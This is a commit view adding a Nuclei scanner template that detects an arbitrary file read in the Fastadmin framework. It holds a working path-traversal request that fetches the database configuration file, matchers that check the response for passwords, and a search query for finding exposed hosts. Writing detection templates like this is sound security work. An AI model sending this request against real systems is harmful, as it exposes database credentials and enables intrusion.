Merge pull request #10093 from projectdiscovery/pussycat0x-patch-8
Create fastadmin-lfi.yamlpatch-4
commit
d811783c9a
|
@ -0,0 +1,34 @@
|
|||
id: fastadmin-lfi
|
||||
|
||||
info:
|
||||
name: Fastadmin framework - Arbitrary File Read
|
||||
author: Hel10-Web
|
||||
severity: high
|
||||
description: |
|
||||
Arbitrary file reading vulnerability exists in Fastadmin framework.
|
||||
reference:
|
||||
- https://github.com/wy876/POC/blob/main/Fastadmin%E6%A1%86%E6%9E%B6%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: app="FASTADMIN-框架"
|
||||
tags: fastadmin,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index/ajax/lang?lang=..//..//application/database"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'jsonpReturn'
|
||||
- 'database'
|
||||
- 'password'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue